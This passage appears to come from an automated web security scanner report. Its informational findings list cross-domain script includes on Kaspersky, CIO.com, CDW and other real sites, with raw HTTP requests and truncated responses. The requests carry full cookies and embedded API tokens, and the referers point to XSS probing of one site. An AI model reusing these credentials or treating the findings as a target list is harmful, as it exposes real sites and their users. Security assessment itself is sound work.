User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:26:42 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139202"
Content-Type: text/html; charset=utf-8
Content-Length: 77836
Date: Sun, 04 Sep 2011 12:27:00 GMT
X-Varnish: 1163057207
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...
<div style="padding-top:5px;">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

16.52. http://usa.kaspersky.com/products-services/home-computer-security/pure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

Response

16.53. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /products-services/home-computer-security/tablet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:35:38 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139738"
Content-Type: text/html; charset=utf-8
Content-Length: 49404
Date: Sun, 04 Sep 2011 12:35:59 GMT
X-Varnish: 1163071400
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.54. http://usa.kaspersky.com/resources/knowledge-center/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /resources/knowledge-center/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:22 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145062"
Content-Type: text/html; charset=utf-8
Content-Length: 36942
Date: Sun, 04 Sep 2011 14:04:30 GMT
X-Varnish: 1163241755
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.55. http://usa.kaspersky.com/resources/knowledge-center/whitepapers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /resources/knowledge-center/whitepapers HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:30:59 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139459"
Content-Type: text/html; charset=utf-8
Content-Length: 54170
Date: Sun, 04 Sep 2011 12:31:08 GMT
X-Varnish: 1163064132
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.56. http://usa.kaspersky.com/search/apachesolr_search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /search/apachesolr_search HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:37 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145077"
Content-Type: text/html; charset=utf-8
Content-Length: 29455
Date: Sun, 04 Sep 2011 14:04:45 GMT
X-Varnish: 1163242354
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.57. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /search/apachesolr_search/far%20help%20virus HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:25:35 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139135"
Content-Type: text/html; charset=utf-8
Content-Length: 37531
Date: Sun, 04 Sep 2011 12:25:51 GMT
X-Varnish: 1163055428
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.58. http://usa.kaspersky.com/search/apachesolr_search/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /search/apachesolr_search/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:36 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145076"
Content-Type: text/html; charset=utf-8
Content-Length: 30322
Date: Sun, 04 Sep 2011 14:04:48 GMT
X-Varnish: 1163242323
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.59. http://usa.kaspersky.com/search/apachesolr_search/xss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /search/apachesolr_search/xss HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

16.60. http://usa.kaspersky.com/store/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /store/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:21 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145061"
Content-Type: text/html; charset=utf-8
Content-Length: 36177
Date: Sun, 04 Sep 2011 14:04:29 GMT
X-Varnish: 1163241738
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.61. http://usa.kaspersky.com/store/kaspersky-store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/kaspersky-store

Issue detail

The response dynamically includes the following scripts from other domains:

http://drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
http://drh.img.digitalriver.com/DRHM/Storefront/Site/kasperus/cm/multimedia/OT_Files/kaspersky-hosted/kasperus_globalTrial.js
http://drh.img.digitalriver.com/DRHM/Storefront/Site/kasperus/cm/multimedia/OT_Files/kaspersky-hosted/kasperus_kaspersky_store_contentBody.js
http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /store/kaspersky-store HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:25:15 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139115"
Content-Type: text/html; charset=utf-8
Content-Length: 62521
Date: Sun, 04 Sep 2011 12:25:24 GMT
X-Varnish: 1163054948
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

<script src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js"></script>
<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/kasperus/cm/multimedia/OT_Files/kaspersky-hosted/kasperus_globalTrial.js"></script>
<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/kasperus/cm/multimedia/OT_Files/kaspersky-hosted/kasperus_kaspersky_store_contentBody.js"></script>
...[SNIP]...

16.62. http://virusalert.nl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://virusalert.nl
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://eas.apm.emediate.eu/EAS_tag.1.0.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAA08Og9lk0c9JI2RvJ5jO4SRRvhZclZLymftYl_GkA3kNisOi5xRRfFMtfejkWh1sHyM8_71SYlhy8Jw

Request

GET / HTTP/1.1
Host: virusalert.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:04:54 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: banner_85=2
Set-Cookie: banner_83=2
Set-Cookie: banner_84=2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 37125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<HEAD>

<script type="text/javascript" language="JavaScript" src="http://eas.apm.emediate.eu/EAS_tag.1.0.js"></script>
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://eas.apm.emediate.eu/EAS_tag.1.0.js"></script>
...[SNIP]...
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.63. http://www.2linkme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.2linkme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://scripts.chitika.net/eminimalls/amm.js

Request

GET / HTTP/1.1
Host: www.2linkme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.64. http://www.accusoft.com/formsuitedemo.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.accusoft.com
Path:	/formsuitedemo.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /formsuitedemo.htm HTTP/1.1
Host: www.accusoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 31 Aug 2011 15:41:25 GMT
Accept-Ranges: bytes
ETag: "1bec5971f467cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:05:48 GMT
Connection: close
Content-Length: 33505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.65. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barracudanetworks.com
Path:	/ns/products/web-application-controller-overview.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_hidden_menus=a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3Bi%3A1%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Tue, 04-Oct-2011 14:06:21 GMT; path=/
Date: Sun, 04 Sep 2011 14:06:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<div id="live-chat-loader" style="display: none">
<script type="text/javascript" src="http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f"></script>
...[SNIP]...

16.66. http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cdw.com
Path:	/shop/search/hubs/Products/Software/F.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://media.richrelevance.com/rrserver/js/0.4/p13n.js

Request

GET /shop/search/hubs/Products/Software/F.aspx HTTP/1.1
Host: www.cdw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.67. http://www.cdw.com/shop/search/software-titles/websense-web-security.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cdw.com
Path:	/shop/search/software-titles/websense-web-security.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://assets.delvenetworks.com/player/embed.js

Request

GET /shop/search/software-titles/websense-web-security.aspx HTTP/1.1
Host: www.cdw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.68. http://www.cfoworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cfoworld.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.demandbase.com/api/v1/ip.json?token=3d68d549e3aef54ccf4ddf405831970ea8380f3a&callback=OPG.Demandbase.dbase_parse
http://w.sharethis.com/button/buttons.js?button=false

Request

GET / HTTP/1.1
Host: www.cfoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.69. http://www.cio.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cio.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.demandbase.com/api/v1/ip.json?token=bacca8eba8bded95b5dd46f7a3d8ebc282966537&callback=dbase_parse
http://apis.google.com/js/plusone.js
http://content.dl-rms.com/rms/mother/572/nodetag.js
http://google.com/coop/cse/brand?form=searchbox_005964914320811651291%3Axkqet_zlicy
http://jlinks.industrybrains.com/jsct?sid=143&ct=CIO_HP_ROS&tr=CIO_WIDE&num=4&layt=4v1&fmt=simp
http://www.simplyhired.com/c/job-widget/js/widget.js

Request

GET / HTTP/1.1
Host: www.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:06:21 GMT
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600, public, max-age=600, public, max-age=600
Expires: Sun, 04 Sep 2011 14:16:21 GMT
Keep-Alive: timeout=5, max=486
Connection: Keep-Alive
Set-Cookie: NSC_djp.dpn=44593c713660;expires=Sun, 04-Sep-11 14:16:31 GMT;path=/
Content-Length: 129329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <script type="text/javascript" src="http://m.cio.com/mobify
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/572/nodetag.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=bacca8eba8bded95b5dd46f7a3d8ebc282966537&callback=dbase_parse"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_005964914320811651291%3Axkqet_zlicy"></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://www.simplyhired.com/c/job-widget/js/widget.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=143&ct=CIO_HP_ROS&tr=CIO_WIDE&num=4&layt=4v1&fmt=simp"></script>
...[SNIP]...

   <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...

16.70. http://www.cloudscan.me/2010/12/usakaperskycom-cross-site-scripting-xss.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudscan.me
Path:	/2010/12/usakaperskycom-cross-site-scripting-xss.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com
http://www.blogger.com/static/v1/jsbin/957670695-comment_from_post_iframe.js
http://www.blogger.com/static/v1/widgets/3871175110-widgets.js
http://www.google.com/jsapi

Request

GET /2010/12/usakaperskycom-cross-site-scripting-xss.html HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sun, 04 Sep 2011 12:55:08 GMT
Date: Sun, 04 Sep 2011 12:55:08 GMT
Cache-Control: private, max-age=0
Last-Modified: Sun, 04 Sep 2011 12:37:40 GMT
ETag: "e8b18e41-1136-4831-a7fa-6a54ef8fa169"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 63238
Server: GSE

<!DOCTYPE html>
